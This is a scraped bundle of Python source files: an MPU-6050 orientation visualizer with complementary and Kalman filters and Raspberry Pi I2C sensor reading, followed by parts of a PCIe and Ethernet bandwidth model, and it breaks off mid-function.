    pts_acc[:, :, t_idx] = helpers.rotate_corners(angles[:, t_idx])
    pts_cf[:, :, t_idx] = helpers.rotate_corners(cf_angles[:, t_idx])
    pts_kf[:, :, t_idx] = helpers.rotate_corners(kf_angles[:, t_idx])
# --------------------------------------------------------------------------------------------------------------------
# Assume the data is arriving one by one and plot it
# --------------------------------------------------------------------------------------------------------------------
style.use("ggplot")
# GLOBAL VARIABLES
f = Figure(figsize=(5,5), dpi=100)
ax_roll = f.add_subplot(2,3,1)
ax_pitch = f.add_subplot(2,3,2)
ax_yaw = f.add_subplot(2,3,3)
#ax_acc = f.add_subplot(2,3,4, projection="3d")
#ax_acc.set_aspect("auto")
#ax_acc.set_autoscale_on(True)
ax_kf = f.add_subplot(2,3,6, projection="3d")
ax_kf.set_aspect("auto")
ax_kf.set_autoscale_on(True)
def animate(idx):
    # Animation callback: frame `idx` plots the cube orientation and angle
    # traces up to sample idx. `idx % 1 == 0` is always true (kept as-is).
    if idx % 1 == 0:
        ax_roll.clear()
        ax_pitch.clear()
        ax_yaw.clear()
        #ax_acc.clear()
        ax_kf.clear()
        # plot cube:
        pt_a = pts_acc[:, :, idx]
        pt_cf = pts_cf[:, :, idx]
        pt_kf = pts_kf[:, :, idx]
        for j in range(0, 2):
            # up/down
            # NOTE(review): the guarded branch below references ax_cf and
            # ax_acc, which are never created (ax_acc is commented out above);
            # enabling it as-is would raise NameError.
            if False:
                ax_cf.plot3D(*zip(pt_cf[:, 0 + j], pt_cf[:, 2 + j]), color="g")
                ax_cf.plot3D(*zip(pt_cf[:, 0 + j], pt_cf[:, 4 + j]), color="g")
                ax_cf.plot3D(*zip(pt_cf[:, 4 + j], pt_cf[:, 6 + j]), color="g")
                ax_cf.plot3D(*zip(pt_cf[:, 6 + j], pt_cf[:, 2 + j]), color="g")
                ax_cf.plot3D(*zip(pt_cf[:, 0 + 2 * j], pt_cf[:, 1 + 2 * j]), color="g")
                ax_cf.plot3D(*zip(pt_cf[:, 4 + 2 * j], pt_cf[:, 5 + 2 * j]), color="g")
                ax_acc.plot3D(*zip(pt_a[:, 0 + j], pt_a[:, 2 + j]), color="g")
                ax_acc.plot3D(*zip(pt_a[:, 0 + j], pt_a[:, 4 + j]), color="g")
                ax_acc.plot3D(*zip(pt_a[:, 4 + j], pt_a[:, 6 + j]), color="g")
                ax_acc.plot3D(*zip(pt_a[:, 6 + j], pt_a[:, 2 + j]), color="g")
                ax_acc.plot3D(*zip(pt_a[:, 0 + 2 * j], pt_a[:, 1 + 2 * j]), color="g")
                ax_acc.plot3D(*zip(pt_a[:, 4 + 2 * j], pt_a[:, 5 + 2 * j]), color="g")
            # Draw the 12 edges of the Kalman-filtered cube.
            ax_kf.plot3D(*zip(pt_kf[:, 0 + j], pt_kf[:, 2 + j]), color="g")
            ax_kf.plot3D(*zip(pt_kf[:, 0 + j], pt_kf[:, 4 + j]), color="g")
            ax_kf.plot3D(*zip(pt_kf[:, 4 + j], pt_kf[:, 6 + j]), color="g")
            ax_kf.plot3D(*zip(pt_kf[:, 6 + j], pt_kf[:, 2 + j]), color="g")
            ax_kf.plot3D(*zip(pt_kf[:, 0 + 2 * j], pt_kf[:, 1 + 2 * j]), color="g")
            ax_kf.plot3D(*zip(pt_kf[:, 4 + 2 * j], pt_kf[:, 5 + 2 * j]), color="g")
        if False:
            ax_cf.set_xlim([-10, 10])
            ax_cf.set_ylim([-10, 10])
            ax_cf.set_zlim([-10, 10])
            ax_acc.set_xlim([-10, 10])
            ax_acc.set_ylim([-10, 10])
            ax_acc.set_zlim([-10, 10])
        ax_kf.set_xlim([-10, 10])
        ax_kf.set_ylim([-10, 10])
        ax_kf.set_zlim([-10, 10])
        #
        # Angle traces (accelerometer vs Kalman filter) up to the current sample.
        ax_roll.plot(t[1:idx], np.rad2deg(angles[0, 1:idx]), label='acc')
        #ax_roll.plot(t[1:idx], np.rad2deg(cf_angles[0, 1:idx]), label='cf')
        ax_roll.plot(t[1:idx], np.rad2deg(kf_angles[0, 1:idx]), label='kf')
        ax_pitch.plot(t[1:idx], np.rad2deg(angles[1, 1:idx]))
        #ax_pitch.plot(t[1:idx], np.rad2deg(cf_angles[1, 1:idx]))
        ax_pitch.plot(t[1:idx], np.rad2deg(kf_angles[1, 1:idx]))
        ax_yaw.plot(t[1:idx], np.rad2deg(angles[2, 1:idx]))
        #ax_yaw.plot(t[1:idx], np.rad2deg(cf_angles[2, 1:idx]))
        ax_yaw.plot(t[1:idx], np.rad2deg(kf_angles[2, 1:idx]))
        ax_roll.set_title(' t = ' + "{:.2f}".format(t[idx]))
        if False:
            ax_cf.set_title('CF')
            ax_acc.set_title('pure Acc')
        ax_kf.set_title('KF')
        ax_roll.set_ylim([-100,100])
        ax_pitch.set_ylim([-100, 100])
        ax_yaw.set_ylim([-100,100])
        ax_roll.set_xlim([0, 30])
        ax_pitch.set_xlim([0, 30])
        ax_yaw.set_xlim([0, 30])
        ax_roll.legend()
    # NOTE(review): rebinding the local parameter has no effect outside
    # this function.
    idx = idx + 1
class MyApp(tk.Tk):
    """Top-level Tk application window hosting the visualizer frames."""

    def __init__(self, *args, **kargs):
        tk.Tk.__init__(self, *args, **kargs)
        container = tk.Frame(self)
        container.pack(side="top", fill="both", expand=True)
        # Let the single grid cell absorb all resizing.
        container.grid_rowconfigure(0, weight=1)
        container.grid_columnconfigure(0, weight=1)
        # Registry of frame instances keyed by their class.
        frame = FirstFrame(container, self)
        self.frames = {FirstFrame: frame}
        frame.grid(row=0, column=0, sticky="nsew")
        self.show_frame(FirstFrame)

    def show_frame(self, class_name):
        """Raise the frame registered under the given class to the front."""
        self.frames[class_name].tkraise()
class FirstFrame(tk.Frame):
    """Frame embedding the matplotlib figure and its navigation toolbar."""

    def __init__(self, parent_frame, controller):
        tk.Frame.__init__(self, parent_frame)
        # Title label above the plot.
        self.label = tk.Label(self, text="MPU 6048")
        self.label.pack(pady=10, padx=10)
        # Embed the module-level figure `f` into this Tk frame.
        canvas = FigureCanvasTkAgg(f, self)
        canvas.draw()
        canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=True)
        toolbar = NavigationToolbar2Tk(canvas, self)
        toolbar.update()
        canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# Build the window, start the animation loop, and hand control to Tk.
app = MyApp()
ani = animation.FuncAnimation(f, animate, interval = 1)
app.mainloop()
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,445
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/filters.py
|
import numpy as np
class ComplementaryFilter:
    """First-order complementary filter fusing accelerometer angles with
    gyro-integrated angles.

    NOTE(review): the ``w_0`` default is a single array shared by every
    instance created without an explicit bias; it is never mutated here,
    so this is safe as written.
    """

    def __init__(self, x_0, w_0=np.zeros((3, 1)), alpha=0.9):
        self.x = x_0        # current fused state (3x1 column)
        self.x_0 = x_0      # copy of the initial state, kept for reference
        self.w_0 = w_0      # gyro bias subtracted on every update
        self.alpha = alpha  # weight of the gyro branch (0..1)

    def update(self, angles_, w_, dt_):
        """Blend new accelerometer angles with the gyro-integrated state."""
        acc_col = np.expand_dims(angles_, axis=1)
        gyro_col = np.expand_dims(w_, axis=1)
        # Integrate the bias-corrected gyro rate on top of the last state.
        gyro_term = self.x + (gyro_col - self.w_0) * dt_
        self.x = (1 - self.alpha) * acc_col + self.alpha * gyro_term
class KalmanFilter:
    """Per-axis two-state ([angle, gyro_bias]) Kalman filter for
    roll/pitch/yaw; each of the three axes is filtered independently.

    Reference: https://eu.mouser.com/applications/sensor_solutions_mems/
    """
    def __init__(self, sigma_angles, sigma_w):
        # Measurement (accelerometer angle) and process (gyro) variances.
        self.sigma_angles = sigma_angles
        self.sigma_w = sigma_w
        self.sigma_b = sigma_w  # bias noise assumed equal to gyro noise
        self.kf_angles = np.zeros((3, 1))  # filtered angle per axis
        self.kf_b = np.zeros((3, 1))       # estimated gyro bias per axis
        # Initial covariance; the angle term assumes a ~10 ms step.
        P = np.array([[self.sigma_w * (10e-3)**2, 0], [0, self.sigma_b]])
        self.kf_P = np.array([P, P, P])
    def process(self, dt, ac_angles_i, gr_W_i):
        """Run one predict/update step for all three axes.

        dt          -- time step in seconds
        ac_angles_i -- accelerometer-derived angles (length 3), measurement
        gr_W_i      -- gyro angular rates (length 3), used as control input
        """
        A = np.array([[1, -dt], [0, 1]])  # transition: bias is subtracted
        B = np.array([[dt], [0]])         # control: integrate the gyro rate
        H = np.array([[1, 0]])            # only the angle is observed
        R = self.sigma_angles             # measurement variance
        Q = np.array([[self.sigma_w ** 2 * dt ** 2, 0], [0, self.sigma_b ** 2]])
        for cmp_idx in range(0, 3):
            x_prev = np.zeros((2, 1))
            x_prev[0] = self.kf_angles[cmp_idx]
            x_prev[1] = self.kf_b[cmp_idx]
            P = self.kf_P[cmp_idx]
            u = gr_W_i[cmp_idx]
            z = ac_angles_i[cmp_idx]
            # predict:
            x_prdct = np.matmul(A, x_prev) + B*u
            P_prdct = np.matmul(np.matmul(A, P), np.transpose(A)) + Q
            # update:
            S = (np.matmul(np.matmul(H, P_prdct), np.transpose(H)) + R)
            kf_gain = np.matmul(np.matmul(P_prdct, np.transpose(H)), np.linalg.inv(S))
            y = z - np.matmul(H, x_prdct)
            x_new = x_prdct + np.matmul(kf_gain, y)
            # BUG FIX: the covariance update is P = (I - K H) @ P_prdct.
            # The original multiplied by np.linalg.inv(P_prdct) instead of
            # P_prdct, which is not the Kalman update and makes the stored
            # covariance meaningless.
            P_new = np.matmul(np.identity(2) - np.matmul(kf_gain, H), P_prdct)
            # save for next iteration
            self.kf_angles[cmp_idx] = x_new[0]
            self.kf_b[cmp_idx] = x_new[1]
            self.kf_P[cmp_idx] = P_new
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,446
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/0010_test_raspy_mpu6050_console.py
|
#!/usr/bin/python
import smbus
import numpy as np
import helpers as helpers
import time
# source: https://tutorials-raspberrypi.com/measuring-rotation-and-acceleration-raspberry-pi/
# Register
# MPU-6050 power-management register addresses (written below to wake
# the device before reading).
power_mgmt_1 = 0x6b
power_mgmt_2 = 0x6c
def read_byte(reg):
    # Read a single byte from register `reg` of the sensor (uses the
    # module-level `bus` and `address` defined below).
    return bus.read_byte_data(address, reg)
def read_word(reg):
    """Read a big-endian 16-bit value from two consecutive registers."""
    high = bus.read_byte_data(address, reg)
    low = bus.read_byte_data(address, reg + 1)
    return (high << 8) + low
def read_word_2c(reg):
    """Read a 16-bit register and interpret it as a signed
    (two's-complement) value."""
    raw = read_word(reg)
    # Values with the sign bit set map into the negative range:
    # raw - 0x10000 == -((65535 - raw) + 1).
    return raw - 0x10000 if raw >= 0x8000 else raw
bus = smbus.SMBus(1)  # use smbus.SMBus(0) for revision 1 boards
address = 0x68  # via i2cdetect
# Activate to be able to address the module
bus.write_byte_data(address, power_mgmt_1, 0)
# Poll the sensor once per second and print the raw readings plus the
# accelerometer-derived orientation angles.
while True:
    # Gyro registers, divided by 131 to get deg/s (per the print label).
    gyro_x = read_word_2c(0x43) / 131
    gyro_y = read_word_2c(0x45) / 131
    gyro_z = read_word_2c(0x47) / 131
    # Accelerometer registers, divided by 16384.0 (presumably LSB per g
    # at the default range -- confirm against the MPU-6050 datasheet).
    acc_x = read_word_2c(0x3b) / 16384.0
    acc_y = read_word_2c(0x3d) / 16384.0
    acc_z = read_word_2c(0x3f) / 16384.0
    # convert to Angles and Angular Velocities:
    factor = 180/np.pi # set to 1 if output in radians.
    roll, pitch, yaw = helpers.get_roll_pitch_yaw(acc_x, acc_y, acc_z, factor=factor)
    # log incoming data:
    print('-- Raw data:')
    print("gyro [deg/sec] wx,wy,wz: {0:.2f},{1:.2f},{2:.2f}".format(gyro_x, gyro_y, gyro_z))
    print("acc [ ] ax,ay,az: {0:.2f},{1:.2f},{2:.2f}".format(acc_x, acc_y, acc_z))
    print('-- angles acc only: factor=1 (radians), factor=180/pi (degrees)')
    print("roll,pitch,yaw: {0:.2f},{1:.2f},{2:.2f}".format(roll, pitch, yaw))
    time.sleep(1)
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,447
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/helpers.py
|
#!/usr/bin/python
import math
import numpy as np
import os
def dist(a, b):
    """Euclidean length of the 2-D vector (a, b)."""
    squared = (a * a) + (b * b)
    return math.sqrt(squared)
def get_roll_pitch_yaw(x, y, z, factor=1):
    """Derive roll/pitch/yaw from the accelerometer components.

    factor -- scaling applied to the result: 1 for radians,
              180/pi for degrees.
    Roll is returned sign-flipped to match the sensor orientation.
    """
    horiz_yz = np.sqrt(y ** 2 + z ** 2)
    horiz_xz = np.sqrt(x ** 2 + z ** 2)
    horiz_xy = np.sqrt(x ** 2 + y ** 2)
    roll = factor * np.arctan2(x, horiz_yz)
    pitch = factor * np.arctan2(y, horiz_xz)
    yaw = factor * np.arctan2(horiz_xy, z)
    return -roll, pitch, yaw
# Get values from file:
def get_data_from_file(file_name, degrees=True):
    """Load a capture written as consecutive ``np.save`` records.

    Each record is a length-10 vector:
    [t_ms, roll, pitch, yaw, acc_x, acc_y, acc_z, w_x, w_y, w_z].

    file_name -- path of the capture file
    degrees   -- True if the stored angles are already in degrees;
                 when False the angles are converted from degrees to
                 radians (matching the original branch's print messages)

    Returns (t, angles, acc, w), each transposed so axis 0 is the
    component and axis 1 is the sample index. t is in seconds, shifted
    so the second sample is the time origin; the w_x row is sign-flipped
    to correct the sensor axis.
    """
    data = []
    with open(file_name, 'rb') as f:
        # Keep loading one record at a time until the end of the file.
        while f.tell() < os.fstat(f.fileno()).st_size:
            try:
                data.append(np.load(f))
            except EOFError:
                break
    data = np.array(data)
    # time: remove t0:
    t = data[:, 0]/1000  # in seconds
    t = t - t[1]
    t[0] = 0
    # angles
    angles = data[:, 1:4]
    # BUG FIX: the original tested `if ~degrees:`. `~` is bitwise NOT, so
    # ~True == -2 and ~False == -1 are BOTH truthy and the conversion
    # branch always ran regardless of the flag. `not degrees` is the
    # intended boolean negation.
    if not degrees:
        print('From file: angles in radians')
        angles = angles*np.pi/180
    else:
        print('From file: angles in degrees')
    # rest of data: acc, gyro
    acc = data[:, 4:7]
    w = data[:, 7:10]
    w[:, 0] = w[:, 0]*-1  # correction of sign in wx
    t = np.transpose(t)
    angles = np.transpose(angles)
    acc = np.transpose(acc)
    w = np.transpose(w)
    return t, angles, acc, w
def rotate_corners(angles):
    """Return the 8 corners of the board (3x8 array) rotated by the
    given [roll, pitch, yaw] angles (radians)."""
    roll, pitch, yaw = angles[0], angles[1], angles[2]
    # Unit-cube corners scaled to the board dimensions.
    corners = np.array([[1., 1, 1, 1, -1, -1, -1, -1],
                        [1, 1, -1, -1, 1, 1, -1, -1],
                        [1, -1, 1, -1, 1, -1, 1, -1]])
    dims = np.expand_dims(np.array([4.5, 3, 1.25]), axis=1)
    corners = dims * corners
    # Elementary rotation matrices (roll and pitch enter negated).
    c_r, s_r = np.cos(-roll), np.sin(-roll)
    c_p, s_p = np.cos(-pitch), np.sin(-pitch)
    c_y, s_y = np.cos(yaw), np.sin(yaw)
    rot_roll = np.array([[c_r, 0., -s_r], [0., 1., 0.], [s_r, 0., c_r]])
    rot_pitch = np.array([[1., 0, 0.], [0., c_p, s_p], [0., -s_p, c_p]])
    rot_yaw = np.array([[c_y, s_y, 0.], [-s_y, c_y, 0], [0, 0, 1]])
    # Apply roll, then pitch, then yaw.
    return np.matmul(rot_yaw, np.matmul(rot_pitch, np.matmul(rot_roll, corners)))
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,448
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/0030_recover_from_file.py
|
import numpy as np
import matplotlib.pyplot as plt
import helpers as helpers
# --------------------------------------------------------------------------------------------------------------------
# Read the File / Load data:
# --------------------------------------------------------------------------------------------------------------------
file_name = 'capture_0010.mpudat'
t, angles, acc, w = helpers.get_data_from_file(file_name, degrees=True)
# get angles from gyros: integrate the bias-corrected rates over time.
angles_g = np.zeros_like(angles)
tmp = np.zeros((3, 1))  # NOTE(review): unused, kept for compatibility
# Remove the initial gyro bias, assuming the sensor starts static.
w = w - w[:, 0:1]
for i in range(1,angles_g.shape[1]):
    dt = t[i] - t[i-1]
    angles_g[:, i] = angles_g[:, i-1] + dt*w[:, i]
# --------------------------------------------------------------------------------------------------------------------
# Plot the data: rows are angles / acc / gyro, columns are x/y/z.
# --------------------------------------------------------------------------------------------------------------------
fig, axs = plt.subplots(3, 3)
for i in range(0, 3):
    axs[0, i].plot(t, angles[i, :])      # accelerometer-derived angles
    axs[0, i].plot(t, angles_g[i, :])    # gyro-integrated angles
    axs[1, i].plot(t, acc[i, :])
    axs[2, i].plot(t, w[i, :])
    for j in range(0,3):
        axs[j, i].set_xlim(-1, 50)
        axs[j, i].grid()
# Labels/Titles:
axs[0,0].set_title('roll')
axs[0,1].set_title('pitch')
axs[0,2].set_title('yaw')
axs[1,0].set_title('acc_x')
axs[1,1].set_title('acc_y')
axs[1,2].set_title('acc_z')
axs[2,0].set_title('w_x')
axs[2,1].set_title('w_y')
axs[2,2].set_title('w_z')
plt.show()
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,449
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/0035_batch_offline_processing.py
|
import numpy as np
import matplotlib.pyplot as plt
import helpers as helpers
import filters as filters
# --------------------------------------------------------------------------------------------------------------------
# Read the File / Load data:
# --------------------------------------------------------------------------------------------------------------------
file_name = 'capture_0010.mpudat'
t, angles, _, w = helpers.get_data_from_file(file_name, degrees=True)
# --------------------------------------------------------------------------------------------------------------------
# Sensor fusion:
# --------------------------------------------------------------------------------------------------------------------
w_0 = np.zeros((3, 1))  # NOTE(review): overwritten below after bias removal
# remove initial bias (Assume it starts static)
# NOTE(review): the bias sample is taken at index 2, presumably to skip
# start-up transients -- confirm against the capture format.
w = w - w[:, 2:3]
angles[0,:] = angles[0,:]*-1   # flip roll sign to match the gyro axis
w[0,:] = w[0,:]                # NOTE(review): no-op, kept as in original
w_0 = w[:, 2]                  # zero vector after the subtraction above
comp_filter = filters.ComplementaryFilter(x_0=np.zeros((3, 1)), w_0=w_0, alpha=0.8)
kf_filter = filters.KalmanFilter(sigma_angles=4**2, sigma_w=2**2)
cf_angles = np.zeros((3, t.shape[0]))
kf_angles = np.zeros((3, t.shape[0]))
# Run both filters sample by sample and record their angle estimates.
for t_idx in range(1, t.shape[0]):
    dt = t[t_idx] - t[t_idx-1]
    comp_filter.update(angles_=angles[:, t_idx], w_=w[:, t_idx], dt_=dt)
    kf_filter.process(dt=dt, ac_angles_i=angles[:, t_idx], gr_W_i=w[:, t_idx])
    # get the values from the filters:
    cf_angles[:, t_idx] = comp_filter.x[:, 0]
    kf_angles[:, t_idx] = kf_filter.kf_angles[:, 0]
# --------------------------------------------------------------------------------------------------------------------
# Plot the data: one row per angle, all three estimates overlaid.
# --------------------------------------------------------------------------------------------------------------------
fig, axs = plt.subplots(3, 1)
for i in range(0, 3):
    axs[i].plot(t, np.rad2deg(angles[i, :]), label='Accelerometer')
    axs[i].plot(t, np.rad2deg(cf_angles[i, :]), label='Comp Filter')
    axs[i].plot(t, np.rad2deg(kf_angles[i, :]), label='Kalman Filter')
    axs[i].set_xlim(-1, 30)
    axs[i].set_ylim(-90, 90)
    axs[i].grid()
axs[0].set_title('roll')
axs[1].set_title('pitch')
axs[2].set_title('yaw')
axs[2].legend(loc='lower right')
plt.show()
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,456
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/eth.py
|
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""Some general function and data to calculate rates for Ethernet"""
# pylint: disable=bad-whitespace
# pylint: disable=invalid-name
# pylint: disable=too-many-instance-attributes
import sys
# Configuration options
Variants = ['400GigE', '200GigE', '100GigE', '50GigE', '40GigE', '25GigE', '10GigE', 'GigE']
# Various fields on the wire, all in Bytes
Pre = 7              # Preamble
SOF = 1              # Start of Frame indicator
Hdr = 14             # Header
Hdr_VLAN = 18        # Header including 802.1Q VLAN tag
MinPayLoad = 46      # Minimum Payload size
MinPayLoad_VLAN = 42 # Minimum Payload size with a VLAN tag
CRC = 4              # Checksum
IFG = 12             # Interframe Gap
IFG_GigE = 8         # Optionally reduce IFG for 1GigE
IFG_10GigE = 5       # Optionally reduce IFG for 10GigE
IFG_25GigE = 5       # Optionally reduce IFG for 25GigE
IFG_40plusGigE = 1   # Optionally reduce IFG for 40GigE and faster
class Cfg():
    """A class representing an Ethernet link. Allows to get
    various metrics based on a specific configuration"""
    def __init__(self, variant='40GigE', vlan=True, ifg_min=False):
        """Instantiate a Ethernet config.
        - variant: One of the Variants
        - vlan: Should the frames contain a VLAN tag
        - ifg_min: minimum allowed interframe gap or standard
        """
        if variant not in Variants:
            raise Exception("Unsupported ethernet variant: %s" % variant)
        self.variant = variant
        self.vlan = vlan
        self.ifg_min = ifg_min
        # Line rate in bits per second, derived from the variant name.
        giga = 1000 * 1000 * 1000
        rate_gb = {'400GigE': 400, '200GigE': 200, '100GigE': 100,
                   '50GigE': 50, '40GigE': 40, '25GigE': 25,
                   '10GigE': 10, 'GigE': 1}
        self.rate = rate_gb[variant] * giga
        self.pre_sz = Pre + SOF
        # VLAN tagging grows the header and shrinks the minimum payload.
        self.hdr_sz = Hdr_VLAN if vlan else Hdr
        self.min_pay = MinPayLoad_VLAN if vlan else MinPayLoad
        # Interframe gap: either the standard 12B or the variant minimum.
        if ifg_min:
            min_ifg = {'GigE': IFG_GigE, '10GigE': IFG_10GigE,
                       '25GigE': IFG_25GigE}
            self.trail_sz = min_ifg.get(variant, IFG_40plusGigE)
        else:
            self.trail_sz = IFG
        self.crc_sz = CRC
    def pps(self, payload):
        """Return the rate of packets for a given payload"""
        # Payloads below the Ethernet minimum are padded on the wire.
        wire_pay = max(payload, self.min_pay)
        frame_B = self.pre_sz + self.hdr_sz + wire_pay + self.crc_sz + self.trail_sz
        return self.rate / float(frame_B * 8)
    def bps(self, payload):
        "Bits per second of payload bits"
        return self.pps(payload) * payload * 8
    def pps_ex(self, frame_sz):
        """Return the rate of packets for a given payload. Assume
        @frame_sz includes ethernet header and CRC"""
        return self.pps(frame_sz - self.hdr_sz - self.crc_sz)
    def bps_ex(self, frame_sz):
        """Bits per second of payload bits for a given payload. Assume
        @frame_sz includes ethernet header and CRC"""
        return self.pps_ex(frame_sz) * frame_sz * 8
    def us_ex(self, frame_sz):
        """Calculate how long (in us) it takes to transmit a frame
        of a given size. Assume @frame_sz includes ethernet header and CRC."""
        wire_B = frame_sz + self.pre_sz + self.trail_sz
        return (float(wire_B * 8)/self.rate) * 1000 * 1000
if __name__ == '__main__':
    # Minimal self-test: print rate metrics for common frame sizes for
    # the variant given on the command line (default 100GigE) and dump a
    # per-size table to eth.dat for plotting.
    variant = '100GigE'
    if len(sys.argv) == 2:
        variant = sys.argv[1]
    # not much of a test
    e = Cfg(variant)
    print("%4s %9s %11s %s" % ("sz", "pps", "bps", "ns"))
    for sz in [64, 128, 256, 512, 1024, 1518, 4096, 9000]:
        print("%4d %9d %11d %.2f" % (sz, e.pps_ex(sz), e.bps_ex(sz), 1000.0 * e.us_ex(sz)))
    # BUG FIX: the original never closed eth.dat; a context manager
    # flushes and closes the file deterministically.
    with open("eth.dat", "w") as dat:
        dat.write("\"Frame Size(Bytes)\" "
                  "\"Packets/s\" "
                  "\"Bits/s\" "
                  "\"Gb/s\" "
                  "\"Time (us)\" "
                  "\n")
        for sz in range(64, 1519):
            _pps = e.pps_ex(sz)
            bw = e.bps_ex(sz)
            gbs = float(bw) / (1000 * 1000 * 1000)
            us = e.us_ex(sz)
            dat.write("%d %f %f %f %f\n" % (sz, _pps, bw, gbs, us))
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,457
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/util.py
|
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""Utility functions"""
from . import pcie
# pylint: disable=invalid-name
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
def low_com_mul(x, y):
    """Find the lowest common multiplier of two numbers
    """
    def find_gcf(dividend, divisor):
        # Euclid's algorithm: take remainders until one divides evenly.
        reminder = -1
        while reminder != 0:
            reminder = dividend % divisor
            if reminder != 0:
                dividend = divisor
                divisor = reminder
        return divisor
    # Start Euclid with the larger value as the dividend.
    if x > y:
        dividend, divisor = x, y
    else:
        dividend, divisor = y, x
    gcf = find_gcf(dividend, divisor)
    # BUG FIX: use floor division. Under Python 3, '/' is true division
    # and returned a float (e.g. 12.0 instead of 12). x*y is always an
    # exact multiple of gcd(x, y), so '//' loses nothing.
    return (x * y) // gcf
def gen_res(bwspec, direction, data_sz,
            tx_rx_data_B, tx_tx_data_B, rx_rx_data_B, rx_tx_data_B):
    """Work out the result based on the available bandwidth (@bwspec),
    @direction of transfer and how many bytes were transferred
    (@data_sz).
    The caller also has to provide:
    @tx_rx_data_B: Bytes for TX received by the device
    @tx_tx_data_B: Bytes for TX transmitted by the device
    @rx_rx_data_B: Bytes for RX received by the device
    @rx_tx_data_B: Bytes for RX transmitted by the device

    Returns a pcie.BW_Res carrying the required raw and effective
    bandwidth in each direction.

    NOTE(review): if @direction contains neither pcie.DIR_TX nor
    pcie.DIR_RX, neither branch binds the req_raw_*_bw (and, for
    BW_EFF, eff_*_bw) names and the return raises NameError -- callers
    are expected to always pass at least one direction bit.
    """
    # Work out overall bytes in each direction per batch
    raw_rx_B = 0
    raw_tx_B = 0
    if direction & pcie.DIR_TX != 0:
        # DIR_TX is from the device, so we look at rx_??_data_B
        raw_rx_B += rx_rx_data_B
        raw_tx_B += rx_tx_data_B
    if direction & pcie.DIR_RX != 0:
        # DIR_RX is from the device, so we look at tx_??_data_B
        raw_rx_B += tx_rx_data_B
        raw_tx_B += tx_tx_data_B
    if bwspec.type == pcie.BW_Spec.BW_RAW:
        # this calculation only makes sense if a raw bandwidth has been
        # specified. We work out if raw_tx_b fits in the available
        # bandwidth. If not, we need to adjust the number of rx blocks...
        raw_tx_b = raw_tx_B * 8
        raw_rx_b = raw_rx_B * 8
        # Available raw bandwidth converted to bit/s (bwspec values
        # appear to be in Gbit/s, given the 10**9 scaling).
        avail_raw_tx_bw_b = bwspec.tx_bw * (10**9)
        avail_raw_rx_bw_b = bwspec.rx_bw * (10**9)
        # work out how many transactions the RX can cope with
        max_trans = avail_raw_rx_bw_b / float(raw_rx_b)
        # assume we can support the RX data rate with TX for requests
        req_raw_tx_bw_b = max_trans * raw_tx_b
        if req_raw_tx_bw_b > avail_raw_tx_bw_b:
            # can't send enough requests as we'd run out of TX bandwidth
            # Adjust the tx and rx work. Assume TX is maxed out
            req_raw_tx_bw_b = avail_raw_tx_bw_b
            # number of read requests we can support
            max_trans = req_raw_tx_bw_b / float(raw_tx_b)
            # work out new rx bandwidth
            req_raw_rx_bw_b = max_trans * raw_rx_b
        else:
            # we are maxed out on RX, so just use the tlp_bw
            req_raw_rx_bw_b = avail_raw_rx_bw_b
        # Back to Gbit/s for the result object.
